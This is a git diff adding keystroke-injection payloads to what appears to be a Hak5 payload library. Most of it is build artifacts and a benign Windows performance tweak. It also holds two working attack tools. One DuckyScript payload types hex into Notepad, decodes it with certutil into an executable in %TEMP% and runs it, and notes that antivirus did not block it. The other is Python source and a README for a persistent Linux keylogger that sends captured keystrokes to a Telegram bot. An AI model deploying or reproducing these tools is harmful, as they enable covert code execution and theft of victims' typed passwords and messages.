+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-utility-l1-1-0.dll',
+   'BINARY'),
+  ('base_library.zip',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\base_library.zip',
+   'DATA')],
+ False,
+ False,
+ False,
+ [],
+ None,
+ None,
+ None)

payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/build/example/PYZ-00.toc

@@ -0,0 +1,314 @@
+('C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+ 'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\PYZ-00.pyz',
+ [('_compat_pickle',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\_compat_pickle.py',
+   'PYMODULE'),
+  ('_compression',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\_compression.py',
+   'PYMODULE'),
+  ('_py_abc',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\_py_abc.py',
+   'PYMODULE'),
+  ('_pydecimal',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\_pydecimal.py',
+   'PYMODULE'),
+  ('_strptime',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\_strptime.py',
+   'PYMODULE'),
+  ('_threading_local',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\_threading_local.py',
+   'PYMODULE'),
+  ('argparse',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\argparse.py',
+   'PYMODULE'),
+  ('ast',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\ast.py',
+   'PYMODULE'),
+  ('base64',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\base64.py',
+   'PYMODULE'),
+  ('bisect',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\bisect.py',
+   'PYMODULE'),
+  ('bz2',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\bz2.py',
+   'PYMODULE'),
+  ('calendar',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\calendar.py',
+   'PYMODULE'),
+  ('contextlib',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\contextlib.py',
+   'PYMODULE'),
+  ('contextvars',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\contextvars.py',
+   'PYMODULE'),
+  ('copy',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\copy.py',
+   'PYMODULE'),
+  ('csv',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\csv.py',
+   'PYMODULE'),
+  ('ctypes',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\ctypes\\__init__.py',
+   'PYMODULE'),
+  ('ctypes._endian',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\ctypes\\_endian.py',
+   'PYMODULE'),
+  ('dataclasses',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\dataclasses.py',
+   'PYMODULE'),
+  ('datetime',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\datetime.py',
+   'PYMODULE'),
+  ('decimal',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\decimal.py',
+   'PYMODULE'),
+  ('dis',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\dis.py',
+   'PYMODULE'),
+  ('email',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\__init__.py',
+   'PYMODULE'),
+  ('email._encoded_words',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\_encoded_words.py',
+   'PYMODULE'),
+  ('email._header_value_parser',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\_header_value_parser.py',
+   'PYMODULE'),
+  ('email._parseaddr',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\_parseaddr.py',
+   'PYMODULE'),
+  ('email._policybase',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\_policybase.py',
+   'PYMODULE'),
+  ('email.base64mime',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\base64mime.py',
+   'PYMODULE'),
+  ('email.charset',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\charset.py',
+   'PYMODULE'),
+  ('email.contentmanager',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\contentmanager.py',
+   'PYMODULE'),
+  ('email.encoders',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\encoders.py',
+   'PYMODULE'),
+  ('email.errors',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\errors.py',
+   'PYMODULE'),
+  ('email.feedparser',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\feedparser.py',
+   'PYMODULE'),
+  ('email.generator',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\generator.py',
+   'PYMODULE'),
+  ('email.header',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\header.py',
+   'PYMODULE'),
+  ('email.headerregistry',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\headerregistry.py',
+   'PYMODULE'),
+  ('email.iterators',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\iterators.py',
+   'PYMODULE'),
+  ('email.message',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\message.py',
+   'PYMODULE'),
+  ('email.parser',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\parser.py',
+   'PYMODULE'),
+  ('email.policy',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\policy.py',
+   'PYMODULE'),
+  ('email.quoprimime',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\quoprimime.py',
+   'PYMODULE'),
+  ('email.utils',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\email\\utils.py',
+   'PYMODULE'),
+  ('fractions',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\fractions.py',
+   'PYMODULE'),
+  ('ftplib',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\ftplib.py',
+   'PYMODULE'),
+  ('getopt',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\getopt.py',
+   'PYMODULE'),
+  ('getpass',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\getpass.py',
+   'PYMODULE'),
+  ('gettext',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\gettext.py',
+   'PYMODULE'),
+  ('gzip',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\gzip.py',
+   'PYMODULE'),
+  ('hashlib',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\hashlib.py',
+   'PYMODULE'),
+  ('http',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\http\\__init__.py',
+   'PYMODULE'),
+  ('http.client',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\http\\client.py',
+   'PYMODULE'),
+  ('http.cookiejar',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\http\\cookiejar.py',
+   'PYMODULE'),
+  ('importlib',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\__init__.py',
+   'PYMODULE'),
+  ('importlib._abc',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\_abc.py',
+   'PYMODULE'),
+  ('importlib._bootstrap',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\_bootstrap.py',
+   'PYMODULE'),
+  ('importlib._bootstrap_external',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\_bootstrap_external.py',
+   'PYMODULE'),
+  ('importlib.abc',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\abc.py',
+   'PYMODULE'),
+  ('importlib.machinery',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\machinery.py',
+   'PYMODULE'),
+  ('importlib.metadata',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\metadata\\__init__.py',
+   'PYMODULE'),
+  ('importlib.metadata._adapters',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\metadata\\_adapters.py',
+   'PYMODULE'),
+  ('importlib.metadata._collections',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\metadata\\_collections.py',
+   'PYMODULE'),
+  ('importlib.metadata._functools',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\metadata\\_functools.py',
+   'PYMODULE'),
+  ('importlib.metadata._itertools',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\metadata\\_itertools.py',
+   'PYMODULE'),
+  ('importlib.metadata._meta',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\metadata\\_meta.py',
+   'PYMODULE'),
+  ('importlib.metadata._text',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\metadata\\_text.py',
+   'PYMODULE'),
+  ('importlib.readers',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\readers.py',
+   'PYMODULE'),
+  ('importlib.resources',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\resources\\__init__.py',
+   'PYMODULE'),
+  ('importlib.resources._adapters',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\resources\\_adapters.py',
+   'PYMODULE'),
+  ('importlib.resources._common',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\resources\\_common.py',
+   'PYMODULE'),
+  ('importlib.resources._itertools',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\resources\\_itertools.py',
+   'PYMODULE'),
+  ('importlib.resources._legacy',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\resources\\_legacy.py',
+   'PYMODULE'),
+  ('importlib.resources.abc',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\resources\\abc.py',
+   'PYMODULE'),
+  ('importlib.resources.readers',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\resources\\readers.py',
+   'PYMODULE'),
+  ('importlib.util',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\importlib\\util.py',
+   'PYMODULE'),
+  ('inspect',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\inspect.py',
+   'PYMODULE'),
+  ('logging',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\logging\\__init__.py',
+   'PYMODULE'),
+  ('lzma',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\lzma.py',
+   'PYMODULE'),
+  ('mimetypes',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\mimetypes.py',
+   'PYMODULE'),
+  ('netrc',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\netrc.py',
+   'PYMODULE'),
+  ('nturl2path',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\nturl2path.py',
+   'PYMODULE'),
+  ('numbers',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\numbers.py',
+   'PYMODULE'),
+  ('opcode',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\opcode.py',
+   'PYMODULE'),
+  ('pickle',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\pickle.py',
+   'PYMODULE'),
+  ('pprint',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\pprint.py',
+   'PYMODULE'),
+  ('py_compile',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\py_compile.py',
+   'PYMODULE'),
+  ('quopri',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\quopri.py',
+   'PYMODULE'),
+  ('random',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\random.py',
+   'PYMODULE'),
+  ('selectors',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\selectors.py',
+   'PYMODULE'),
+  ('shlex',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\shlex.py',
+   'PYMODULE'),
+  ('shutil',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\shutil.py',
+   'PYMODULE'),
+  ('signal',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\signal.py',
+   'PYMODULE'),
+  ('socket',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\socket.py',
+   'PYMODULE'),
+  ('ssl',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\ssl.py',
+   'PYMODULE'),
+  ('statistics',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\statistics.py',
+   'PYMODULE'),
+  ('string',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\string.py',
+   'PYMODULE'),
+  ('stringprep',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\stringprep.py',
+   'PYMODULE'),
+  ('subprocess',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\subprocess.py',
+   'PYMODULE'),
+  ('tarfile',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\tarfile.py',
+   'PYMODULE'),
+  ('tempfile',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\tempfile.py',
+   'PYMODULE'),
+  ('textwrap',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\textwrap.py',
+   'PYMODULE'),
+  ('threading',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\threading.py',
+   'PYMODULE'),
+  ('tracemalloc',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\tracemalloc.py',
+   'PYMODULE'),
+  ('typing',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\typing.py',
+   'PYMODULE'),
+  ('zipfile',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\zipfile.py',
+   'PYMODULE')])

payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/build/example/example.exe.manifest

@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
+  <assemblyIdentity type="win32" name="example" processorArchitecture="amd64" version="1.0.0.0"/>
+  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
+    <security>
+      <requestedPrivileges>
+        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
+      </requestedPrivileges>
+    </security>
+  </trustInfo>
+  <dependency>
+    <dependentAssembly>
+      <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" language="*" processorArchitecture="*" version="6.0.0.0" publicKeyToken="6595b64144ccf1df"/>
+    </dependentAssembly>
+  </dependency>
+  <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
+    <application>
+      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
+      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
+      <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
+      <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
+      <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
+    </application>
+  </compatibility>
+  <application xmlns="urn:schemas-microsoft-com:asm.v3">
+    <windowsSettings>
+      <longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware>
+    </windowsSettings>
+  </application>
+</assembly>

payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/build/example/warn-example.txt

@@ -0,0 +1,28 @@
+
+This file lists modules PyInstaller was not able to find. This does not
+necessarily mean this module is required for running your program. Python and
+Python 3rd-party packages include a lot of conditional or optional modules. For
+example the module 'ntpath' only exists on Windows, whereas the module
+'posixpath' only exists on Posix systems.
+
+Types if import:
+* top-level: imported at the top-level - look at these first
+* conditional: imported within an if-statement
+* delayed: imported within a function
+* optional: imported within a try-except-statement
+
+IMPORTANT: Do NOT post this list to the issue-tracker. Use it as a basis for
+            tracking down the missing module yourself. Thanks!
+
+missing module named 'org.python' - imported by copy (optional)
+missing module named org - imported by pickle (optional)
+missing module named pwd - imported by posixpath (delayed, conditional, optional), shutil (delayed, optional), tarfile (optional), pathlib (delayed, optional), subprocess (delayed, conditional, optional), netrc (delayed, conditional), getpass (delayed)
+missing module named grp - imported by shutil (delayed, optional), tarfile (optional), pathlib (delayed, optional), subprocess (delayed, conditional, optional)
+missing module named posix - imported by os (conditional, optional), posixpath (optional), shutil (conditional), importlib._bootstrap_external (conditional)
+missing module named resource - imported by posix (top-level)
+missing module named _frozen_importlib_external - imported by importlib._bootstrap (delayed), importlib (optional), importlib.abc (optional)
+excluded module named _frozen_importlib - imported by importlib (optional), importlib.abc (optional)
+missing module named _posixsubprocess - imported by subprocess (conditional)
+missing module named fcntl - imported by subprocess (optional)
+missing module named _scproxy - imported by urllib.request (conditional)
+missing module named termios - imported by getpass (optional)

payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/convert_to_hex.py

@@ -0,0 +1,15 @@
+import binascii
+
+def convert_to_hex(filename, output_file):
+    with open(filename, 'rb') as file:
+        binary_data = file.read()
+
+    hex_code = binascii.hexlify(binary_data).decode()
+
+    with open(output_file, 'w') as output:
+        output.write(hex_code)
+
+# Esempio di utilizzo
+exe_filename = 'C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/dist/example.exe'
+output_filename = 'C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.txt'
+convert_to_hex(exe_filename, output_filename)

payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/dist/README.md

@@ -0,0 +1 @@
+Executables have been removed for security reasons.

payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/example.py

@@ -0,0 +1,3 @@
+import ctypes
+
+ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)

payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/example.spec

@@ -0,0 +1,44 @@
+# -*- mode: python ; coding: utf-8 -*-
+
+
+block_cipher = None
+
+
+a = Analysis(
+    ['example.py'],
+    pathex=[],
+    binaries=[],
+    datas=[],
+    hiddenimports=[],
+    hookspath=[],
+    hooksconfig={},
+    runtime_hooks=[],
+    excludes=[],
+    win_no_prefer_redirects=False,
+    win_private_assemblies=False,
+    cipher=block_cipher,
+    noarchive=False,
+)
+pyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher)
+
+exe = EXE(
+    pyz,
+    a.scripts,
+    a.binaries,
+    a.zipfiles,
+    a.datas,
+    [],
+    name='example',
+    debug=False,
+    bootloader_ignore_signals=False,
+    strip=False,
+    upx=True,
+    upx_exclude=[],
+    runtime_tmpdir=None,
+    console=True,
+    disable_windowed_traceback=False,
+    argv_emulation=False,
+    target_arch=None,
+    codesign_identity=None,
+    entitlements_file=None,
+)

payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt

@@ -0,0 +1,49 @@
+REM ###########################################################################################
+REM #                                                                                         |
+REM # Title        : Install And Run Any Arbitrary Executable - No Internet And Root Needed   |
+REM # Author       : Aleff                                                                    |
+REM # Version      : 1.0                                                                      |
+REM # Category     : Execution                                                                |
+REM # Target       : Windows 10/11                                                            |
+REM #                                                                                         |
+REM ###########################################################################################
+
+
+REM Requirements:
+REM     - Nothing
+
+
+REM Define here your hexadecimal code
+DEFINE #HEX_CODE example
+
+
+REM Note:
+REM     - Tested on Windows 11
+REM     - Running checked but not blocked by Avast antivirus
+
+
+GUI r
+DELAY 1000
+STRINGLN notepad.exe
+DELAY 2000
+STRING #HEX_CODE
+DELAY 2000
+ALT F
+DELAY 1000
+STRING S
+DELAY 1000
+STRINGLN "%TEMP%\example.hex"
+DELAY 1000
+ENTER
+DELAY 1000
+ALT F4
+DELAY 2000
+GUI r
+DELAY 500
+STRINGLN certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
+DELAY 1000
+ENTER
+DELAY 1000
+GUI r
+DELAY 250
+STRINGLN "%TEMP%\example.exe"

payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/README.md

@@ -0,0 +1,41 @@
+# Make Windows performant (but ugly and boring)
+
+This script can be used to change some advanced Windows settings to make it as efficient as possible albeit losing some of the fluidity and beauty of the operating system.
+
+This script is Plug-And-Play <3
+
+**Category**: Execution
+
+![](Make_Windows_performant_but_ugly_and_boring.gif)
+
+## Description
+
+This script can be used to change some advanced Windows settings to make it as efficient as possible albeit losing some of the fluidity and beauty of the operating system.
+
+The script opens the Windows advanced settings via sysdm.cpl and accesses the advanced settings by changing the selected option for best performance and unchecking all possible features.
+
+### Dependencies
+
+* Nothing is needed, this script is Plug-And-Play <3
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt

@@ -0,0 +1,47 @@
+REM ##################################################################
+REM #                                                                |
+REM # Title        : Make Windows performant (but ugly and boring)   |
+REM # Author       : Aleff                                           |
+REM # Version      : 1.0                                             |
+REM # Category     : Execution                                       |
+REM # Target       : Windows 10/11                                   |
+REM #                                                                |
+REM ##################################################################
+
+REM Plug-And-Play <3
+
+REM Requirements:
+REM     - Nothing
+
+REM Note:
+REM     - Payload tested on Windows 11 Eng 
+
+
+DEFAULT_DELAY 500
+GUI r
+DELAY 2000
+
+REM Open advanced settings
+STRINGLN sysdm.cpl
+DELAY 2000
+
+REM Goto nav bar
+REPEAT 5 TAB
+
+REM Goto Advanced
+REPEAT 2 RIGHTARROW
+
+REM Open Settings
+TAB
+REM Invia il comando
+ENTER
+
+REM Adjust for best performance
+REPEAT 2 DOWNARROW
+
+REM Save it
+REPEAT 4 TAB
+DELAY 3000
+
+REM Close the windows (not the os lol)
+REPEAT 2 ALT F4

payloads/library/execution/Persistent_Keylogger-Telegram_Based/README.md

@@ -0,0 +1,53 @@
+# Persistent Keylogger - Telegram Based
+
+A script used to configure a persistent keylogger on a Linux computer trough a pre-configured Telegram Bot.
+
+**Category**: Execution
+
+## Dependencies
+
+* Internet Connection
+
+## Description
+
+A script used to configure a persistent keylogger on a Linux computer trough a pre-configured Telegram Bot.
+
+This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.
+
+In the script, you can find two classes that inherit Thread called Keylogger and Sender, and a shared memory class called Log. The Thread classes perform two distinct tasks:
+
+- Keylogger: The Keylogger class is responsible for capturing the pressed keys using the keyboard library. Based on the detected key, a modified callback function specified in the function call is invoked. When the usage of a certain keyboard key is detected, it is subsequently added to the log variable using the `add_to_log()` method of the `self.log` object from the Log class.
+
+- Sender: The Sender class represents a thread solely dedicated to periodically invoking the `send_log()` method of the `self.log` object from the Log class.
+
+- Log: The Log class represents a shared memory entity. The shared memory is the variable `self.log`, which is periodically managed through the `add_to_log()` and `send_log()` methods. This class was designed with the aim of avoiding data loss, and thus a lock management system was applied to prevent undesirable or unexpected situations when multiple users write rapidly. To handle the locks, `RLock` and `Condition` were chosen in the respective methods of the class.
+
+The `add_to_log(self, log)` method acquires the lock through the invocation of `with self.lock` and updates the internal variable with the new received character. As the only waiting condition on the lock management is when the variable `self.lock` is empty, immediately after updating the internal variable, the unlocking function `self.condition.notify_all()` is invoked, allowing all threads (in this case, actually only 1, the Sender) to wake up and proceed with the sending operation.
+
+The `send_log(self)` method acquires the lock and enters a waiting condition using `self.condition.wait()` if the variable `self.log` is empty. Once the lock is reacquired following a wake-up, the Sender Thread proceeds with sending the message using the `bot.send_message(...)` command, resetting the `self.log` variable to an empty initial state.
+
+It is worth noting that although this Telegram bot could be used dynamically by anyone, it might be a good practice to use the ID statically (line 16 of the Python file) since the message recipients will always be you and not someone else (at least it shouldn't be so). This aspect may be considered less secure as it exposes sensitive and delicate information concerning your privacy and identity. However, since this script is not intended for malicious purposes or real-world use, but rather for educational purposes, it has been thoughtfully created and designed for study purposes.
+
+Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Persistent_Keylogger-Telegram_Based/connection.py

@@ -0,0 +1,79 @@
+from telebot import TeleBot
+from time import sleep
+import keyboard
+from threading import Thread,RLock,Condition
+
+# Set here the Telegram bot token
+BOT_TOKEN = ""
+bot = TeleBot(BOT_TOKEN)
+
+class Log:
+    def __init__(self):
+        self.log = ""
+        self.lock = RLock()
+        self.condition = Condition(self.lock)
+        # Set here the Telegram user id
+        self.id = "0123456789"
+       
+    def add_to_log(self, log):
+    	with self.lock:
+    	    #print("Adding to log...")
+    	    self.log += log
+    	    self.condition.notify_all()
+    
+    def send_log(self):
+        with self.lock:
+            #print("Sending to bot...")
+            while self.log == "":
+                #print("Waiting resources...")
+                self.condition.wait()
+            #print("Sending message!")
+            bot.send_message(self.id, self.log)
+            self.log = ""
+
+class Keylogger(Thread):
+
+    def __init__(self, log):
+        super().__init__()
+        self.log = log
+       
+    def callback(self, event):
+        name = event.name
+        if len(name) > 1:
+            if name == "space":
+                name = "[SPACE]"
+            elif name == "enter":
+                name = "[ENTER]\n"
+            elif name == "decimal":
+                name = "."
+            else:
+                name = name.replace(" ", "_")
+                name = f"[{name.upper()}]"
+        #print(f"Keylogger add to log: {name}")
+        self.log.add_to_log(name)
+        
+    def run(self):
+        keyboard.on_release(callback=self.callback)
+
+class Sender(Thread):
+
